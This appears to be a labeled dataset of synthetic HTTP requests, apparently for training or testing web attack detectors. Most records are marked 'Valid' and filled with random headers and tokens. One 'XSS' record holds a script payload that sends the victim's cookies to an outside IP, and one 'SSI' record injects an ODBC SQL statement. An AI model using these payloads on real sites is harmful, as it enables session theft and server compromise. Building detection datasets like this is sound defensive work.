~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16163
Start - Id: 9928
class: Valid
GET /DY1KH/3LG_/qn79PhcYyt5gB-7/Db/ItinI/8j6qpAteFrBgB/cSmXTD/aI1BrZj@QJX0/7GNcKLQpDb0nu_/ln/ckcnarpthwntd/l9UqSyy_v7pvFGvlVSF.pl? HTTP/1.0
Host: www.n64adioab.gov:90540
Connection: keep-alive
Accept: application/zip;q=0.9, image/png, image/*;q=0.4
Accept-Charset: windows-1257, iso-8859-5, x-mac-roman;q=0.5, koi8-r;q=0.8, iso-8859-5;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: rtvkZ0e='3efhll8'
Client-ip: 196.18.89.25
Cookie: unslDOOde=72455;ddo1eWph=nmetan1vtq;fApidI8=ep5o79RuKG;yE5n=4ccopy'ferr
Cookie2: $Version="2"
Date: Fri, 17 Apr 09 05:22:53 CET
ETag: "vx4sXFZuE2ziptGDL"
Expect: m8dkgye
From: hoyaen@w8anmIEhtt.org
If-Modified-Since: Mon, 26 May 08 05:44:20 UTC
If-Unmodified-Since: Mon, 13 Aug 07 10:33:01 CET
If-Match: *
If-None-Match: "9Hz4Pp1jKQyqhxb"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: sortr0 0me4nev=peEt
Range: -073,-7284,0-
Referer: http://Paeo.st/8Lah/etlly/veeass/coSa.jsp
TE: trailers,trailers
Trailer: Range
User-Agent: tT5Zjbe1 http://www.TAgtt.net
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 496x973
Via: HTTP/9.6 www.sjapz.html
Transfer-Encoding: eefctd
Upgrade: auldc/3.6, reoo/4.9
Warning: 491 www.heg8eii9.html "ntpermoteOf5acfh" "Fri, 03 Mar 06 14:55:17 GMT"
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 443764018144231043
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9928
Start - Id: 47228
class: XSS
GET /polyiefn/2UKNvRStpQMP/3L8_gz9x/u9Lavobvw0/aY8sV7j5-bXqbfGtWEQ/n8Oh/merte3eohe.jpeg?neeaemnt=like+U&ctiauEqr=raStztlsek1d&teSsgc9wu=garrsvuUcodse&xdartveOep=%3Cstyle+%3E%3C%21--%3C%2Fstyle++%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F214.40.221.80%2Fandeti.msf%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E HTTP/1.1
Host: 140.241.33.6
Connection: uiTao
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: don-fhg
Cache-Control: x=eThme
Client-ip: 40.248.52.118
Cookie: 69Xl=o4zldb0Bbq;tlxg=2sl2aN;eee4baemsoi=ibZXVXx46
Cookie2: $Version="98"
Date: Thu, 20 Nov 08 20:47:14 CET
ETag: "3M5PzY4fxhZpNvBVJEK"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Mon, 29 Jan 07 16:02:49 CET
If-Match: *
If-None-Match: "UX9uLPzAzjqFi7xHlkNU"
If-Range: Thu, 01 Apr 10 23:20:28 GMT
Max-Forwards: 995
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest nc=421422DE
Range: 60-99
Referer: http://bo15uu.st/8Ruyoeht/ae3aes/yrefah/f8dedau/eeaensl.asp
TE: gzip
Trailer: TE
User-Agent: Mozilla/6.1 (compatible; Konqueror/3.4; Windows NT; xaeiEiwht)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 www.3ett6.jpg, 0.9 73.56.31.83, HTTP/1.2 www.shuamr.js
Transfer-Encoding: gzip
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47228
Start - Id: 10641
class: Valid
GET /cmwCn/ig6/tsiowfte4ro5/h@3/ahhcsonax01Rliqom.msf?eadl6AOt=7936571432&nac=ssrsctxrdhCi&nuReWrvC=89&ii7e=3Etdyjhesa0e HTTP/1.0
Host: 162.170.57.155
Connection: inho
Accept: text/*, video/mpeg, video/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 245.125.61.90
Cookie: dauycpjalinci=6325139;lrr=ls'hiniinput:2hbef;Aq=irraie;ashemVnehdaa=ca7;aa0vitp=(mr)
Cookie2: $Version="0"
Date: Tue, 18 Aug 09 23:13:19 CET
ETag: W/"6JAOVGGez7Ua0VcS"
Expect: 100-continue
From: 2a5l@oierufMLhr.com
If-Modified-Since: Wed, 05 Nov 08 03:47:29 CET
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: "k59qDOp5p9FuamRRJRW"
If-None-Match: "ziPKAglFc6@SuwW"
If-Range: Fri, 18 Aug 06 01:18:29 GMT
Max-Forwards: 703
MIME-Version: 7.8
Pragma: poe2ul='o1awneca'
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest algorithm=MD5-sess
Range: 6-0447,7686-38299,7705-
Referer: /ot8tYibC/eenwe/neH7/beIRe.jpg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: gcuodueeiaszi
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: FTP/6.7 www.yomrh.png
Transfer-Encoding: gzip
Upgrade: esd8yb/3.6, ebr7u/3.4, gieesh/7.2, iqtelo/1.1, oAp/5.7
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10641
Start - Id: 14403
class: Valid
GET /ly/siqeot2tihrixttei/Llib_.27fromjtdohomencb/in/4tMiframe/pi/2X@5UQI.gif?Q3B@-yJkar=ifftetutlgeTA&dd4sK=+linkgcopy&Mbnoi0dE=%7EautoexecpasswdIh&oeolt=oH+Snd7&dz=d&mebip4te=95GT8k5x&ki=ont&-bj93roc4=eoQPM&t_OstqxJ=3943841&thlte=hdzsystem7&ec=184 HTTP/1.0
Host: 198.144.146.39
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eus-i6g, i-peeteedi;q=0.3, n-mli, Lhhtlna-nirUo;q=0.3
Cache-Control: min-fresh=78
Client-ip: 13.103.41.0
Cookie: jkU_Tee-YEhaving8=cox
Cookie2: $Version="325"
Date: Thu, 10 Nov 05 20:10:29 GMT
ETag: W/"-IIunH1Ndzny1pXic43"
Expect: osi9
From: Rt7eei@haruek9a0.st
If-Modified-Since: Fri, 09 Apr 10 20:36:31 CET
If-Unmodified-Since: Sat, 09 Sep 06 08:31:07 GMT
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: Mon, 16 May 05 07:21:01 CET
Max-Forwards: 1033
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: Digest realm
Range: 30-
Referer: http://www.rtOnAr.be/ioeehhSn.ace
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 0.0; nu-ot; rv:7.5.8) Gecko/12741569
UA-CPU: StrongARM
UA-Disp: 664,370,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: HTTP/9.8 252.109.39.47
Transfer-Encoding: compress
Upgrade: iidn/5.9, wiont/0.5
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14403
Start - Id: 23360
class: Valid
GET /jcsrtstvdHho7htedO/e.e-it.gif?eteodis0eisqg=06887&ttenvteu=+b&ni=vr&lCevalewO0aSy-=iF2uMZP&oehricv=besg6n%25&1ilaeeFlti=ygq6%25iah&aaoaaA9=226&GdtefgnmiADpls5=e-z&iuAanstdhlI=+&OSu.iWyevalS5v=a&hE5a9vta8b=tg&sasdrrUEai=dBEjk&rserreg=b&fsT7nvbscripteobject=e&fS0TXodN-z-=bg%40-xG1900F HTTP/1.1
Host: www.nhEShe.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress, compress;q=0.0
Accept-Language: naeieun-stAd;q=0.0, nn-Agdsb, 6elttCv-e;q=0.5, r7nvrat-enap0ON;q=0.9
Cache-Control: max-stale=09
Client-ip: 254.183.167.167
Cookie: lfr4gDczWP.w=2675456;o1iotdt9yn=rde;Oo=4022
Cookie2: $Version="5"
Date: Sat, 04 Sep 04 12:03:42 CET
ETag: "PSH86TPQQ-fvgpGel"
Expect: 100-continue
From: atnntia@abdb.com
If-Modified-Since: Sat, 20 Jan 07 04:22:17 GMT
If-Unmodified-Since: Sat, 13 Aug 05 12:00:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -83
Referer: http://aibe.org/Xi4tan/ihcs/eh12ae/8etrb.mdb
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.5 (Windows; U; Windows NT 8.9; vd-ei; rv:4.7.4) Gecko/00649130
UA-CPU: StrongARM
UA-Disp: 611,430,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: 6.8 www.oehsUrl.shtml, HTTP/8.1 73.137.50.112
Transfer-Encoding: oeimt; h0nirsdh=xqmt
Upgrade: Dueo/9.4, 8voi/8.8, xougi/8.4, ehan/4.9
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23360
Start - Id: 9951
class: Valid
GET /hkrfcom9zIotbfst/sbe/laHoadn9qnThnsym/Agtdo/WHyG/sfZs8YhY.hIAWO3/rj.hqL0Yp/5symCIwLT@YvZyXy/e7cdJKNdY1m/wWbTGN/b.t/tlboiaDtgXyhi.jpeg?rzswl=tr&6ebfianedthGhu=8031&rmf2psqkHW=vetscyo3u4e&tezw=+9opt2uqC%25ooareHl&6BobjectJ_eD=25&cWY@TOq6=epkinBfuseioenn&tP=4aR&qeYpq5iK=includeftire&029bgsoundX8htpassVfromUY=8w1A&n2nIhh7s=1054941680&9iuranusf=+%5Ceobddocument&_qKpV=iestdiniw HTTP/1.0
Host: www.esiil.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 150.172.121.230
Cookie: ji3r=nj2zTc;oanrtelraie=7
Cookie2: $Version="3"
Date: Fri, 06 Mar 09 15:48:25 UTC
ETag: W/"0Fozrq92kBMb6XIAQMM"
Expect: tLno=n2raJi
From: snyou@r8tka9etrf.de
If-Modified-Since: Thu, 29 Nov 07 11:34:58 UTC
If-Unmodified-Since: Wed, 17 Aug 05 17:33:42 GMT
If-Match: *
If-None-Match: "aUIUYqr8oG7NQ5B"
If-Range: *
Max-Forwards: 639
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlobGZlNnJyc2FlaTBiczhiOFJyYWxhbHNwdGVzdXQydEF5RXR5ZQ==
Authorization: NTLM MHJhaWFqRHJoZWFhdGlhTWNvdVNUbEVkc1JldXU5Z2NoNnRydW5tbGk4
Range: -96
Referer: http://edthndv.st/urie/oetcahf.asp
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.6 (Windows; U; WinNT 5.0; 1i-ml; rv:7.0.2) Gecko/41285902
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 596x007
Via: HTTP/2.0 www.xe8zsyL.js, dte/6.0 www.aihr.htm:35
Transfer-Encoding: deflate
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 270 www.yaeei.htm "Qooirdi3rryl8Lsoii" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9951
Start - Id: 21366
class: Valid
GET /rNV3ZdGpY2_/fw8weoUh/oOKRs.cgi?RBEQetcYsqNX=dt-oa HTTP/1.1
Host: 63.216.5.182
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, compress;q=0.7, deflate
Accept-Language: *;q=0.4
Cache-Control: max-stale=932
Client-ip: 83.209.43.203
Cookie: tht5htJiicotqd=oi~ht ja esmte;uf8oarRce8a=939489;siAtrm=hQ&
Cookie2: $Version="03"
Date: Fri, 04 Jun 04 17:21:19 GMT
ETag: "NH-4d06ZBYMuVX6"
Expect: nnts9sl=eerczEea
From: erbhednr@ieSiief.com
If-Modified-Since: Wed, 09 Dec 09 15:34:14 UTC
If-Unmodified-Since: Sat, 31 Oct 09 21:37:36 GMT
If-Match: "Zs-bhpV5DYnyienhAx"
If-None-Match: *
If-Range: "tKjivUtX4KBrlnF1jLo"
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM b2JhMG9uc2llbkM0YWVldGFic1N0Y2RrcjdiRWVVMW1s
Authorization: NTLM bGlsaWJUMmU2cnRzc3lrNXJzRGVhdHV4eXRwZWVobWFlMGFic3RuN3kwZUx5dGh0
Range: -510,-15,91865-958
Referer: /hxkemdae/t7eoARa.fgf
TE: trailers
Trailer: Accept-Encoding
User-Agent: osgyAnafphgOe
UA-CPU: x86
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1496x218
Via: HTTP/8.4 200.135.252.105, gnm/1.8 139.1.193.133
Transfer-Encoding: deflate
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21366
Start - Id: 14498
class: Valid
GET /pFjK8KLmBbx5.bq/e0TktD3eoaeEfusgn7L/eCx9zDvjJk5H/We2/err0puhbxwycabtt/tadiuX/hs6eehbaEonasiojh8/lN/tshxlhoh8/LomXADhtZXW/AoI1nph-CdeletevbscriptZ7c8.jpg?n4j=-drEee8l%3D7Quatmrstelnet&hltRihody=833961&itQbmstial=66 HTTP/1.0
Host: www.dhsafO.gov
Connection: close
Accept: text/xml;q=0.3, text/*;q=0.8, image/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 6eoeaeen-tlns;q=0.9
Cache-Control: no-store
Client-ip: 156.195.173.2
Cookie: rshhl=5947106;feM9sytauhuk=ta1
Cookie2: $Version="909"
Date: Tue, 20 Jun 06 01:12:38 CET
ETag: W/"ugECzM6iUuVZB3pqMlr"
Expect: 100-continue
From: nhsko@onEumg.net
If-Modified-Since: Fri, 23 Apr 10 09:59:48 UTC
If-Unmodified-Since: Fri, 14 Apr 06 23:15:58 GMT
If-Match: *
If-None-Match: "dlDQheQzIuhqwwabaBo"
If-Range: "CCNoujhFENA5qiH"
Max-Forwards: 88
MIME-Version: 5.2
Pragma: itrOruyh='n'
Proxy-Authorization: Digest cnonce="2tl6"
Authorization: n0mr 3Ethitaq=yejS
Range: 737195-
Referer: /ituTi.msf
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 3.4; ru-hf; rv:3.2.0) Gecko/03190309
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 866x6745
Via: 2.0 www.hamk.shtml:9870
Transfer-Encoding: identity
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 242 174.80.186.170:3881 "srhnvra8" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 01337
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14498
Start - Id: 695
class: Valid
GET /lu/Kva/uGnrkq/U.vbscriptwXjP9UBM/8fseisshtshirgnte8on.tiff?qE=353&9ul6etDuO7=y3t7man&bjejaec=0&sl=833542&ede=3&42yieiee3TEuar=73722234&bcp=789311268 HTTP/1.1
Host: 225.55.38.85
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.3, gzip, deflate
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 115.46.241.44
Cookie: connectLn3hNXP=nJhWmT4sLhcK
Cookie2: $Version="933"
Date: Sun, 03 Oct 04 15:23:01 GMT
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Sat, 10 Jan 04 22:11:01 GMT
If-Unmodified-Since: Tue, 27 Jun 06 17:05:44 CET
If-Match: "6qzZ.Iq3IV4cYsm"
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 1
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="hihtp"
Authorization: NTLM cjU5YWVvdmlvc2FFZmFkb25ld2FheHBqbjFlbGRhYWxjYmJ5cg==
Range: -508,-924
Referer: /aisi/n60ha/ptiiLac/cvnN6.msf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: cNnfetN (eEi@jqukWH; wfDCIs; t3y19EjVo; 6kOSfS; ayERaOYfxm)
UA-CPU: x86
UA-Disp: 047,845,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: HTTP/7.6 www.rtesx.png, 5.4 117.58.199.89, 5.6 www.2aSb.htm
Transfer-Encoding: deflate
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 194 84.41.126.122 "mdoaa2i1" "Thu, 12 May 05 04:17:10 CET"
X-Forwarded-For: 26.52.16.97
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 695
Start - Id: 30273
class: Valid
GET /npbfyboe/VTl8K9W/mjainTuliti/fQhCxIXA5iuK1Twu/iQ/pmUsn7oo7ahpnobaqmtt.pl?Snrmezxiooiw=eLoohewnd&4pk=070841&olmrlre=wIuHUe2g2Qs&uo88ylshhhh=myr&auiee8nxei=0690743822&eoeteOteeojst=547&omoiKc=i82umaewrn3sxcvit&vstdinshutdownP=vformEg&neednt4=04091&igiu6fom=903&mOor=6832678879&eovrrrast=9122455 HTTP/1.1
Host: www.hcifh.it
Connection: keep-alive
Accept: text/plain;q=0.1, audio/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: eOe='n07axa'
Client-ip: 20.9.210.88
Cookie: 1Rp-yuWI1nph-=47opzeet6;wezgrsXdeolua=osock_streami79o(;tziIr17ocog==voeakx Nehsucopy ode;-eiIKf=el
Cookie2: $Version="5"
Date: Wed, 08 Apr 09 04:21:53 CET
ETag: "FxV2CAJA_8@TSGKbYY"
Expect: 100-continue
From: iaDu8xrn@BrjrrRgg.gov
If-Modified-Since: Sun, 05 Jun 05 19:51:39 CET
If-Unmodified-Since: Fri, 10 Jul 09 16:13:35 GMT
If-Match: "veJNIunpk2EYbAya"
If-None-Match: *
If-Range: Thu, 18 Jan 07 05:45:06 CET
Max-Forwards: 8412
MIME-Version: 4.6
Pragma: o=e
Proxy-Authorization: Digest qop=auth
Authorization: Odm0ec 9teviq=heer
Range: 52-
Referer: http://nvfa.biz/moeh/0to7n/zohes7.css
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 7.5; rc-es; rv:5.7.7) Gecko/16513311
UA-CPU: StrongARM
UA-Disp: 790,434,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9593x7407
Via: FTP/0.2 44.40.42.21, HTTP/5.1 www.uIiz.css
Transfer-Encoding: compress
Upgrade: fu6eud/5.9, gsnxrd/6.7
Warning: 606 174.199.186.176 "oeyec4mawoE" 
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 686350212460
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30273
Start - Id: 6446
class: Valid
PUT /igJ5pL/g_1D_Q3hqtcJ/sXieqoBYD9Ncm0.gif? HTTP/1.1
Content-Length: 292
Content-Language: dzhsfs4,net,t
Content-Encoding: compress
Content-Location: /ioai/ps2IterA/sadtfae/cneasz.asp
Content-MD5: ZXN1cm90c2FhYnR6bnIzRg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Apr 05 17:09:38 GMT
Last-Modified: Fri, 15 Apr 05 05:55:28 UTC
Host: www.rt6they.biz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hr-os;q=0.8, eni1rtih-bo
Cache-Control: no-transform
Client-ip: 174.238.79.189
Cookie: hneootsnq5u=jeyrfaosu
Cookie2: $Version="1"
Date: Sun, 14 May 06 10:40:58 GMT
ETag: ".0.CU-Fuui1IMPBFhiS"
Expect: 100-continue
From: 3n6as@eicEn.st
If-Modified-Since: Tue, 06 Jul 04 15:19:28 GMT
If-Unmodified-Since: Sun, 11 Apr 10 18:58:28 GMT
If-Match: "Xsqz8Ydr6fnUd@Npcb0"
If-None-Match: "pOb@P3O-hY9tew4m"
If-Range: Fri, 23 Apr 04 05:56:39 GMT
Max-Forwards: 636
MIME-Version: 3.6
Pragma: ittl='treuub'
Proxy-Authorization: Basic b01MYWQ6c05pbHQ=
Authorization: Digest realm
Range: 20995-3,994884-5,-38008
Referer: /ETcarlav.asmx
TE: chunked;q=0.5,trailers
Trailer: Accept
User-Agent: tr.dPN http://www.hrjsn.be
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8174x6805
Via: QWhs/6.1 www.dueaoxoR.css:33, 0.2 www.bEusUpo.png:59771
Transfer-Encoding: deflate
Upgrade: yrnee/7.7
Warning: 732 www.f0zh.png "f2rdso" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dtbne=kg&DCN1DK=asIsr koNnuadscriptom&ed3oEeomGa=59995289&HYErJpYm@.vW=m6-j5fv6sAf&iisorrQm4o=t4opdeeetensmfrnlB&7S4Yym-R2sock_stream=l7bPIrctmpe9lhavingEh&oz=998046468&3hmIb1o=eli&npmuxe9=KPjo&@mailFr8zv0TV=egeadmin]oNi8ne;ldr&eYaycjuDrpsb6=s&ckacSaobstnei=e|bodyr&xklsyvDvscopy=915967

End - Id: 6446
Start - Id: 26552
class: Valid
GET /haeiIeonDgthnne/NuFImgjeFWqRq6Z/yzBH0QIfIfx94RcE76wC/zlHlBwp/snVE/sifyaeeem/nryfChlOjle0/ZD1aJg/an1Fs/fbhK/3JTQp6dT4X.shtml?os9unionV=SbetweenehttpsIpThs&pe=490506&nadee6tlhGstS=179849&asotecnLpRsDmh=exmlmhomellcopyopsnaW&ieTe=42&lontegcvt97=q%40i&kzlDf=reR&ee2carPozrz=lemvool8WtrdnnuSu&t2iwrepstc=vlodettnetie5rattn&LbodyetcVafHHMU=909 HTTP/1.1
Host: 30.179.99.248
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-874;q=0.4, koi8-r;q=0.8, x-mac-icelandic, windows-1250;q=0.5
Accept-Encoding: compress
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 143.47.190.160
Cookie: wdtgrecapstes=mLp
Cookie2: $Version="58"
Date: Sat, 22 Nov 08 07:31:38 CET
ETag: "oYWDHE-qWf8q0qbJ"
Expect: 100-continue
From: siaehprh@e2nnVv.net
If-Modified-Since: Sun, 19 Dec 04 12:38:21 GMT
If-Unmodified-Since: Fri, 30 Jan 09 03:33:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM N2hoY3J0bHN1b21lWGFsUmVteml0NmxXbmV3dHN4NnBh
Authorization: liel btheh6=gllp3agt
Range: 9769-87960,68614-
Referer: /artwceco/s6ch/cneeRp9n/d1e8qat/iSiaeebu.msf
TE: chunked;q=0.2,trailers
Trailer: If-Match
User-Agent: deEui (is7bm2jG; uajhk-aK_b)
UA-CPU: Sparc
UA-Disp: 4186,052,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: tolmq2/5.5 www.fueN.htm
Transfer-Encoding: identity
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 149 www.OrrZtnif.htm:323 "d5aweytiroH" "Thu, 23 Nov 06 11:27:23 UTC"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26552
Start - Id: 40883
class: SSI
GET /gogiinEocqhbj/alhLkbS8ygCq@I-4fCNV.php?XsoTnuheIe2Ge=%3C%21--++++%23odbc+++++statement%3D++++%22select+gdi%2C++++tra%2C+++nfieuiao++++from++++m1Pbs3os++order+++++by++++9%2C++++24%2C+++++0%22++--%3E&pa=ewl&astdeneciaoi=tkhbG&fsciwQO=q53Grz8 HTTP/1.1
Host: www.wTaeEshi.org
Connection: ssgcpta
Accept: text/*;q=0.2, video/quicktime;q=0.2
Accept-Charset: shift_jis;q=0.6, iso-8859-1, iso-8859-2, iso-8859-9
Accept-Encoding: *
Accept-Language: 4xspalee-5;q=0.0, F-tp
Cache-Control: no-cache
Client-ip: 183.81.150.211
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="14"
Date: Wed, 22 Feb 06 15:05:41 UTC
ETag: W/"cdUEMz1rdtb6L7v"
Expect: Bsieuw=kptnu;mohtt
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 12 Apr 06 15:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jun 07 17:47:15 UTC
Max-Forwards: 901
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: dMod 5D9t4=toait6i
Range: 453-748
Referer: http://pCrp.biz/eyteeipa/g3xltwf/m6tagSi.pdf
TE: deflate;q=0.9,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 3.7; 8n-vb; rv:6.8.9) Gecko/45994958
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: 1.4 151.187.253.95
Transfer-Encoding: identity
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 71520
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40883
Start - Id: 24379
class: Valid
GET /R3_eylZ/9SbSn/96/disdtiaese4u/rqhqs@d.HdAx/uIUD/6FiNgPBphr9yj5/bdl1nehaa/B2PI1AyQoptln5vU/t2eendW4iesajeRa.js?lisrJna=odZdhDPT&dcm0pnhhihIhi=0356568&mbeuewDtroojD=34&zqv=elJcQZ&vvlsA=sa2a.pBjQDpH&ouiReaK6uysca=t+&dcTehw=nydAsm1wnitsdO0Atf&rzy5o=kengrg&hi=6823562&4OUQB=p%40us&irrnRfdeLnmi=tekka HTTP/1.0
Host: www.eedolptH.be
Connection: ieeyidn
Accept: application/*, image/*;q=0.6, audio/*;q=0.9
Accept-Charset: iso-10646-ucs-2, x-mac-japanese, iso-8859-3;q=0.3, ks_c_5601-1987;q=0.4, koi8-r
Accept-Encoding: identity;q=0.0, compress;q=0.9, identity;q=0.5
Accept-Language: e-hnfhndj;q=0.0, oeoRhA-hipbs
Cache-Control: max-stale=40
Client-ip: 129.32.61.180
Cookie: ZphpKBY1=gz1FnQ@35P_8;sdbei5dqupiEas=ys;lBifsj=918668
Cookie2: $Version="3"
